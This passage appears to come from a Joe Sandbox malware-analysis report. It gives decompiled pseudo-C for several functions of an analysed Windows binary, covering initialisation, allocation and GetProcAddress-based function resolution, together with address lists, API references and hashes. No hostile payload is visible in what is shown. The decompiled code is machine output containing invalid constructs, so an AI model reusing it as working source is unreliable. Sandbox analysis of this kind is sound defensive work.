				E003EFFF0(_t87, _t89 + 0x2220, 0, 0x40);
				E003EFFF0(_t87, _t89 + 0x2260, 0, 0x34);
				E003EFFF0(_t87, _t89 + 0x45a8, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cfc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d00)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d04)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d08)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d0c)) = 0;
				 *((short*)(_t89 + 0x6d12)) = 0;
				 *((char*)(_t89 + 0x6cee)) = 0;
				 *((char*)(_t89 + 0x6d10)) = 0;
				 *((char*)(_t89 + 0x21f8)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}












                0x003d13dc
                0x003d13dc
                0x003d13e1
                0x003d13e6
                0x003d13e7
                0x003d13ea
                0x003d13ec
                0x003d13ef
                0x003d13f6
                0x003d1402
                0x003d1405
                0x003d1410
                0x003d1414
                0x003d141f
                0x003d1425
                0x003d142b
                0x003d1436
                0x003d143b
                0x003d1440
                0x003d1447
                0x003d144d
                0x003d1453
                0x003d1455
                0x003d147a
                0x003d1457
                0x003d1457
                0x003d145c
                0x003d1462
                0x003d1465
                0x003d146b
                0x003d1476
                0x003d146d
                0x003d146f
                0x003d146f
                0x003d146b
                0x003d147c
                0x003d1488
                0x003d148f
                0x003d1496
                0x003d149f
                0x003d14aa
                0x003d14b4
                0x003d14ba
                0x003d14c0
                0x003d14c6
                0x003d14cc
                0x003d14d2
                0x003d14d8
                0x003d14df
                0x003d14e5
                0x003d14eb
                0x003d14f1
                0x003d14f7
                0x003d14fd
                0x003d150c
                0x003d151b
                0x003d1526
                0x003d152e
                0x003d1534
                0x003d153a
                0x003d1540
                0x003d1546
                0x003d154c
                0x003d1552
                0x003d155b
                0x003d1561
                0x003d1567
                0x003d156f
                0x003d1577

                APIs
                • __EH_prolog.LIBCMT ref: 003D13E1
                  • Part of subcall function 003D5E37: __EH_prolog.LIBCMT ref: 003D5E3C
                  • Part of subcall function 003DCE40: __EH_prolog.LIBCMT ref: 003DCE45
                  • Part of subcall function 003DB505: __EH_prolog.LIBCMT ref: 003DB50A
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 171ca2b53f16aadb1c35795779639ce34fb9bcb61755c23e65ff669690460190
                • Instruction ID: 380bc6ecf564ff3d56fb2336bf1cdaad6810a193f099b4061d0597d8235c37a8
                • Opcode Fuzzy Hash: 171ca2b53f16aadb1c35795779639ce34fb9bcb61755c23e65ff669690460190
                • Instruction Fuzzy Hash: 60416AB1905B409EE725DF3A8885AE6FBE5BF19300F504A2ED5FE87282CB716654CB10
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003E359E Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                Download Yara Rule
                C-Code - Quality: 71%
                			E003E359E(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t29;
				signed int* _t36;
				signed int _t38;
				intOrPtr _t39;
				intOrPtr _t42;
				signed int _t44;
				void* _t47;
				void* _t60;
				signed int _t65;
				void* _t67;
				void* _t69;
				void* _t73;

				_t29 = E003EEB78(0x402a92, _t67);
				_push(__ecx);
				_push(__ecx);
				_t60 = __ecx;
				_t44 = 0;
				_t72 =  *((intOrPtr*)(__ecx + 0x20));
				if( *((intOrPtr*)(__ecx + 0x20)) == 0) {
					_push(0x400400); // executed
					_t42 = E003EEE53(__ecx, __edx, _t72); // executed
					 *((intOrPtr*)(__ecx + 0x20)) = _t42;
					_t29 = E003EFFF0(__ecx, _t42, 0, 0x400400);
					_t69 = _t69 + 0x10;
				}
				_t73 =  *(_t60 + 0x18) - _t44;
				if(_t73 == 0) {
					_t65 =  *((intOrPtr*)(_t60 + 0x1c)) +  *((intOrPtr*)(_t60 + 0x1c));
					_t30 = _t65;
					 *(_t67 - 0x10) = _t65;
					_push( ~(0 | _t73 > 0x00000000) | ( ~(_t73 > 0) | _t65 * 0x00004ae4) + 0x00000004);
					_t36 = E003EEE53(( ~(_t73 > 0) | _t65 * 0x00004ae4) + 4, _t30 * 0x4ae4 >> 0x20, _t73);
					_pop(0x411098);
					 *(_t67 - 0x14) = _t36;
					 *(_t67 - 4) = _t44;
					_t74 = _t36;
					if(_t36 != 0) {
						_push(E003E2360);
						_push(E003E21C0);
						_push(_t65);
						_t16 =  &(_t36[1]); // 0x4
						_t44 = _t16;
						 *_t36 = _t65;
						_push(0x4ae4);
						_push(_t44);
						E003EEC7B(_t44, _t60, _t65, _t74);
					}
					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
					 *(_t60 + 0x18) = _t44;
					_t29 = E003EFFF0(_t60, _t44, 0, _t65 * 0x4ae4);
					if(_t65 != 0) {
						_t38 = 0;
						 *(_t67 - 0x10) = 0;
						do {
							_t47 =  *(_t60 + 0x18) + _t38;
							if( *((intOrPtr*)(_t47 + 0x4ad4)) == 0) {
								 *((intOrPtr*)(_t47 + 0x4adc)) = 0x4100;
								_t39 = E003F3E33(0x411098); // executed
								 *((intOrPtr*)(_t47 + 0x4ad4)) = _t39;
								0x411098 = 0x30c00;
								if(_t39 == 0) {
									E003D6CA7(0x411098);
								}
								_t38 =  *(_t67 - 0x10);
							}
							_t38 = _t38 + 0x4ae4;
							 *(_t67 - 0x10) = _t38;
							_t65 = _t65 - 1;
						} while (_t65 != 0);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t67 - 0xc));
				return _t29;
			}


















                0x003e35a3
                0x003e35a8
                0x003e35a9
                0x003e35ad
                0x003e35af
                0x003e35b1
                0x003e35b4
                0x003e35bb
                0x003e35bc
                0x003e35c4
                0x003e35c7
                0x003e35cc
                0x003e35cc
                0x003e35cf
                0x003e35d2
                0x003e35dd
                0x003e35e4
                0x003e35e6
                0x003e35fe
                0x003e35ff
                0x003e3604
                0x003e3605
                0x003e3608
                0x003e360b
                0x003e360d
                0x003e360f
                0x003e3614
                0x003e3619
                0x003e361a
                0x003e361a
                0x003e361d
                0x003e361f
                0x003e3624
                0x003e3625
                0x003e3625
                0x003e362a
                0x003e3634
                0x003e363b
                0x003e3645
                0x003e3647
                0x003e3649
                0x003e364c
                0x003e364f
                0x003e3658
                0x003e365f
                0x003e3669
                0x003e366e
                0x003e3674
                0x003e3677
                0x003e367e
                0x003e367e
                0x003e3683
                0x003e3683
                0x003e3686
                0x003e368b
                0x003e368e
                0x003e368e
                0x003e364c
                0x003e3645
                0x003e3699
                0x003e36a1

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 8e77410dd84df68dbc9d33eae1b619650232661122dbd4c056d4c28ae65fdb0b
                • Instruction ID: 9c7382d38cdb94dbc40b53a05812d14ac6dd513166cdd366d1db4e9fdc6cc8a4
                • Opcode Fuzzy Hash: 8e77410dd84df68dbc9d33eae1b619650232661122dbd4c056d4c28ae65fdb0b
                • Instruction Fuzzy Hash: DE21E6B1E40265AFDB159F76CC4666B7768FB14314F11033AE505AB7C1D7B49A00C6A8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                Download Yara Rule
                C-Code - Quality: 83%
                			E003EB093(void* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* __esi;
				char _t39;
				char _t41;
				char _t60;
				char _t65;
				signed int _t70;
				void* _t72;
				intOrPtr _t74;
				void* _t77;

				_t77 = __eflags;
				E003EEB78(0x402ae8, _t72);
				_push(__ecx);
				E003EEC50(0x7d2c);
				_push(_t70);
				_push(_t68);
				 *((intOrPtr*)(_t72 - 0x10)) = _t74;
				 *((intOrPtr*)(_t72 - 4)) = 0;
				E003D13DC(_t72 - 0x7d3c, _t68, _t77, 0); // executed
				 *((char*)(_t72 - 4)) = 1;
				E003D1FDC(_t72 - 0x7d3c, __edx, _t70, _t72, _t77,  *((intOrPtr*)(_t72 + 0xc)));
				if( *((intOrPtr*)(_t72 - 0x105f)) == 0) {
					 *((intOrPtr*)(_t72 - 0x24)) = 0;
					 *(_t72 - 0x20) = 0;
					 *((intOrPtr*)(_t72 - 0x1c)) = 0;
					 *((intOrPtr*)(_t72 - 0x18)) = 0;
					 *((char*)(_t72 - 0x14)) = 0;
					 *((char*)(_t72 - 4)) = 2;
					_push(_t72 - 0x24);
					_t59 = _t72 - 0x7d3c;
					_t39 = E003D19AF(_t72 - 0x7d3c, __edx);
					__eflags = _t39;
					if(_t39 != 0) {
						_t70 =  *(_t72 - 0x20);
						_t68 = _t70 + _t70;
						_push(_t70 + _t70 + 2);
						_t65 = E003F3E33(_t59);
						 *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x10)))) = _t65;
						__eflags = _t65;
						if(_t65 != 0) {
							__eflags = 0;
							 *((short*)(_t65 + _t70 * 2)) = 0;
							E003F0320(_t65,  *((intOrPtr*)(_t72 - 0x24)), _t68);
						} else {
							_t70 = 0;
						}
						 *( *(_t72 + 0x14)) = _t70;
					}
					_t60 =  *((intOrPtr*)(_t72 - 0x24));
					 *((char*)(_t72 - 4)) = 3;
					__eflags = _t60;
					if(_t60 != 0) {
						__eflags =  *((char*)(_t72 - 0x14));
						if( *((char*)(_t72 - 0x14)) != 0) {
							__eflags =  *((intOrPtr*)(_t72 - 0x1c)) +  *((intOrPtr*)(_t72 - 0x1c));
							E003DF445(_t60,  *((intOrPtr*)(_t72 - 0x1c)) +  *((intOrPtr*)(_t72 - 0x1c)));
							_t60 =  *((intOrPtr*)(_t72 - 0x24));
						}
						L003F3E2E(_t60);
					}
					E003D1692(_t72 - 0x7d3c, _t68, _t70); // executed
					_t41 = 1;
				} else {
					E003D1692(_t72 - 0x7d3c, _t68, _t70);
					_t41 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t72 - 0xc));
				return _t41;
			}













                0x003eb093
                0x003eb098
                0x003eb09d
                0x003eb0a3
                0x003eb0a9
                0x003eb0aa
                0x003eb0ad
                0x003eb0b7
                0x003eb0ba
                0x003eb0c8
                0x003eb0cc
                0x003eb0d7
                0x003eb0eb
                0x003eb0ee
                0x003eb0f1
                0x003eb0f4
                0x003eb0f7
                0x003eb0fd
                0x003eb101
                0x003eb102
                0x003eb108
                0x003eb10d
                0x003eb10f
                0x003eb111
                0x003eb114
                0x003eb11a
                0x003eb121
                0x003eb126
                0x003eb128
                0x003eb12a
                0x003eb130
                0x003eb133
                0x003eb13b
                0x003eb12c
                0x003eb12c
                0x003eb12c
                0x003eb146
                0x003eb146
                0x003eb148
                0x003eb14b
                0x003eb14f
                0x003eb151
                0x003eb153
                0x003eb157
                0x003eb15c
                0x003eb160
                0x003eb165
                0x003eb165
                0x003eb169
                0x003eb16e
                0x003eb175
                0x003eb17a
                0x003eb0d9
                0x003eb0df
                0x003eb0e4
                0x003eb0e4
                0x003eb181
                0x003eb18a

                APIs
                • __EH_prolog.LIBCMT ref: 003EB098
                  • Part of subcall function 003D13DC: __EH_prolog.LIBCMT ref: 003D13E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: c49b81e274718ec18602c8f4e6d54cc8e497f137631afda0e5cba4b845c7f21f
                • Instruction ID: 28f68496eda65be0ba2f75a8b0d35c218a07fc66484777b367bf35fea09ca6e3
                • Opcode Fuzzy Hash: c49b81e274718ec18602c8f4e6d54cc8e497f137631afda0e5cba4b845c7f21f
                • Instruction Fuzzy Hash: A9316B75C04299ABCF16DF69D9519EEBBB4AF09300F1045AEE409BB282D735AE04CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FAC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 90%
                			E003FAC98(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				intOrPtr* _t34;

				_t20 = 0x432628 + _a4 * 4;
				_t27 =  *0x40e7ac; // 0xc24f6281
				_t29 = _t28 | 0xffffffff;
				_t33 = _t27 ^  *_t20;
				asm("ror esi, cl");
				if(_t33 == _t29) {
					L14:
					return 0;
				}
				if(_t33 == 0) {
					_t34 = _a12;
					if(_t34 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t29 ^ _t27;
							goto L14;
						}
						_t33 = GetProcAddress(_t13, _a8);
						if(_t33 == 0) {
							_t27 =  *0x40e7ac; // 0xc24f6281
							goto L13;
						}
						 *_t20 = E003F7CA3(_t33);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E003FAD34( *_t34); // executed
						if(_t13 != 0) {
							break;
						}
						_t34 = _t34 + 4;
						if(_t34 != _a16) {
							continue;
						}
						_t27 =  *0x40e7ac; // 0xc24f6281
						goto L7;
					}
					_t27 =  *0x40e7ac; // 0xc24f6281
					goto L8;
				}
				L2:
				return _t33;
			}










                0x003faca3
                0x003facac
                0x003facb2
                0x003facbc
                0x003facbe
                0x003facc2
                0x003fad2d
                0x00000000
                0x003fad2d
                0x003facc6
                0x003faccc
                0x003facd2
                0x003facee
                0x003facee
                0x003facf0
                0x003facf2
                0x003fad1d
                0x003fad1f
                0x003fad27
                0x003fad2b
                0x00000000
                0x003fad2b
                0x003facfe
                0x003fad02
                0x003fad17
                0x00000000
                0x003fad17
                0x003fad0b
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003facd4
                0x003facd4
                0x003facd6
                0x003facde
                0x00000000
                0x00000000
                0x003face0
                0x003face6
                0x00000000
                0x00000000
                0x003face8
                0x00000000
                0x003face8
                0x003fad0f
                0x00000000
                0x003fad0f
                0x003facc8
                0x00000000

                APIs
                • GetProcAddress.KERNEL32(00000000,?), ref: 003FACF8
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AddressProc
                • String ID:
                • API String ID: 190572456-0
                • Opcode ID: 4d0dc59da0fec40ec02688daac839861c17e29e5482ed32191ae041fcd0f39cf
                • Instruction ID: c899f7c6e87aa45e079391cd0f3f0807696b4cdfdbecce18cdd74b66c89d13e8
                • Opcode Fuzzy Hash: 4d0dc59da0fec40ec02688daac839861c17e29e5482ed32191ae041fcd0f39cf
                • Instruction Fuzzy Hash: 7D1136B7A00A2D5FDB239E29EC5087AB395ABC032071B4630FE19EB254D730EC0197D2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D9215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                Download Yara Rule
                C-Code - Quality: 55%
                			E003D9215(void* __ebx, void* __edi, void* __eflags) {
				void* _t21;
				intOrPtr _t27;
				intOrPtr _t36;
				void* _t38;
				intOrPtr _t39;
				void* _t41;
				void* _t48;

				E003EEB78(0x402895, _t41);
				E003D13BA(_t41 - 0x20, E003D7C64());
				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
				_t39 = E003DD114( *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 - 0x20)),  *((intOrPtr*)(_t41 - 0x1c)), _t38);
				if(_t39 > 0) {
					_t27 =  *((intOrPtr*)(_t41 + 0x10));
					_t36 =  *((intOrPtr*)(_t41 + 0xc));
					do {
						_t48 = 0 - _t27;
						if(_t48 > 0 || _t48 >= 0 && _t39 >= _t36) {
							_t39 = _t36;
						}
						if(_t39 > 0) {
							E003DD300( *((intOrPtr*)(_t41 + 8)), _t41,  *((intOrPtr*)(_t41 - 0x20)), _t39);
							asm("cdq");
							_t36 = _t36 - _t39;
							asm("sbb ebx, edx");
						}
						_push( *((intOrPtr*)(_t41 - 0x1c)));
						_push( *((intOrPtr*)(_t41 - 0x20)));
						_t39 = E003DD114( *((intOrPtr*)(_t41 + 8)));
					} while (_t39 > 0);
				}
				_t21 = E003D15FB(_t41 - 0x20); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
				return _t21;
			}










                0x003d921a
                0x003d922c
                0x003d923a
                0x003d9243
                0x003d9247
                0x003d924a
                0x003d924e
                0x003d9251
                0x003d9253
                0x003d9255
                0x003d925d
                0x003d925d
                0x003d9261
                0x003d926a
                0x003d9271
                0x003d9272
                0x003d9274
                0x003d9274
                0x003d9276
                0x003d927c
                0x003d9284
                0x003d9286
                0x003d928b
                0x003d928f
                0x003d9298
                0x003d92a0

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 4951a7625cc67e6a1ff8fb2e0a74b2e344a7344c6dbd0cdaca1a4ae4a5782e27
                • Instruction ID: c177b6d14416840954ca8d8daf94cbd082370c2ea663cf6664b0581afdeaa63c
                • Opcode Fuzzy Hash: 4951a7625cc67e6a1ff8fb2e0a74b2e344a7344c6dbd0cdaca1a4ae4a5782e27
                • Instruction Fuzzy Hash: CD016537900578ABCF13ABA8DD81ADEB735AF88750F014627E816BB352DA348D04C6A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EDA52 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                Download Yara Rule
                C-Code - Quality: 80%
                			E003EDA52(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				intOrPtr _t19;
				char _t20;
				char _t21;
				void* _t24;
				void* _t25;
				void* _t38;
				void* _t44;
				intOrPtr _t46;

				_t38 = __edx;
				E003EEB78(0x402b3c, _t44);
				_push(__ecx);
				E003EEC50(0x2108);
				_push(_t25);
				 *((intOrPtr*)(_t44 - 0x10)) = _t46;
				E003F6066(0x425872, "X");
				E003E0659(0x427894, _t38, 0x4035f0);
				E003F6066(0x426892,  *((intOrPtr*)(_t44 + 0xc)));
				E003D5B3D(0x41c578, _t38,  *((intOrPtr*)(_t44 + 0xc)));
				_t4 = _t44 - 4;
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				_t19 = 2;
				 *0x424850 = _t19;
				 *0x42484c = _t19;
				 *0x424848 = _t19;
				_t20 =  *0x418461; // 0x0
				 *0x4236d3 = _t20;
				_t21 =  *0x418462; // 0x1
				 *0x42370c = 1;
				 *0x42370f = 1;
				 *0x4236d4 = _t21;
				E003D7B0D(_t44 - 0x2118, _t38,  *_t4, 0x41c578);
				 *(_t44 - 4) = 1;
				E003D7C7D(_t44 - 0x2118, _t38,  *_t4);
				_t24 = E003D7B9E(_t25, _t44 - 0x2118); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t44 - 0xc));
				return _t24;
			}












                0x003eda52
                0x003eda57
                0x003eda5c
                0x003eda62
                0x003eda67
                0x003eda6a
                0x003eda77
                0x003eda88
                0x003eda95
                0x003edaa6
                0x003edaab
                0x003edaab
                0x003edab7
                0x003edab8
                0x003edabd
                0x003edac2
                0x003edac7
                0x003edacc
                0x003edad1
                0x003edad7
                0x003edade
                0x003edae5
                0x003edaea
                0x003edaf5
                0x003edaf9
                0x003edb04
                0x003edb0e
                0x003edb17

                APIs
                • __EH_prolog.LIBCMT ref: 003EDA57
                  • Part of subcall function 003E0659: _wcslen.LIBCMT ref: 003E066F
                  • Part of subcall function 003D7B0D: __EH_prolog.LIBCMT ref: 003D7B12
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog$_wcslen
                • String ID:
                • API String ID: 2838827086-0
                • Opcode ID: f79eea7c1a2f2ace4b6b667aaac4ef082024115f95f2527afda73d99956214e3
                • Instruction ID: d94911bff7aa2a00070fa902cdd34018e7c67af1f918f7e88789bfb9bebf1af4
                • Opcode Fuzzy Hash: f79eea7c1a2f2ace4b6b667aaac4ef082024115f95f2527afda73d99956214e3
                • Instruction Fuzzy Hash: 21112B76608294AED722EF94BC077DC3BB4DB15310F5080AFF1009A3D2DBB91644CB69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F3C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 100%
                			E003F3C0D(void* __ecx, signed int _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				_Unknown_base(*)()* _t10;
				struct HINSTANCE__* _t12;
				_Unknown_base(*)()* _t13;
				_Unknown_base(*)()** _t19;
				signed int _t20;
				signed int _t21;

				_t19 = 0x4320ec + _a4 * 4;
				_t10 =  *_t19;
				_t21 = _t20 | 0xffffffff;
				if(_t10 == _t21) {
					L6:
					return 0;
				}
				if(_t10 == 0) {
					_t12 = E003F3B72(__ecx, _a12, _a16); // executed
					if(_t12 == 0) {
						L5:
						 *_t19 = _t21;
						goto L6;
					}
					_t13 = GetProcAddress(_t12, _a8);
					if(_t13 == 0) {
						goto L5;
					}
					 *_t19 = _t13;
					return _t13;
				}
				return _t10;
			}









                0x003f3c15
                0x003f3c1c
                0x003f3c1f
                0x003f3c24
                0x003f3c51
                0x00000000
                0x003f3c51
                0x003f3c28
                0x003f3c30
                0x003f3c39
                0x003f3c4f
                0x003f3c4f
                0x00000000
                0x003f3c4f
                0x003f3c3f
                0x003f3c47
                0x00000000
                0x00000000
                0x003f3c4b
                0x00000000
                0x003f3c4b
                0x003f3c56

                APIs
                • GetProcAddress.KERNEL32(00000000,?), ref: 003F3C3F
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AddressProc
                • String ID:
                • API String ID: 190572456-0
                • Opcode ID: 6031710eaf1a9fc264a77cca61eb74ccde269bb8a6346823866a59946874acf1
                • Instruction ID: 8fc6e520ba5dbf4a20f02515bdee142488893432f068ca7937c47823860c092e
                • Opcode Fuzzy Hash: 6031710eaf1a9fc264a77cca61eb74ccde269bb8a6346823866a59946874acf1
                • Instruction Fuzzy Hash: 43F0E53220021E9FCF178EA8EC009AA77ADEF01B217104135FB05E7190DB31DA20C790
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F8E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 94%
                			E003F8E06(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = _a4;
				if(_t9 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E003F91A8())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t9 == 0) {
					_t9 = _t9 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4326e4, 0, _t9); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E003F8C34();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E003F7A5E(_t7, _t8, __eflags, _t9);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}








                0x003f8e06
                0x003f8e0c
                0x003f8e12
                0x003f8e44
                0x003f8e49
                0x003f8e4f
                0x00000000
                0x003f8e4f
                0x003f8e16
                0x003f8e18
                0x003f8e18
                0x003f8e2f
                0x003f8e38
                0x003f8e40
                0x00000000
                0x00000000
                0x003f8e20
                0x003f8e22
                0x00000000
                0x00000000
                0x003f8e25
                0x003f8e2a
                0x003f8e2b
                0x003f8e2d
                0x00000000
                0x00000000
                0x003f8e2d
                0x00000000

                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,?,?,003F4286,?,0000015D,?,?,?,?,003F5762,000000FF,00000000,?,?), ref: 003F8E38
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
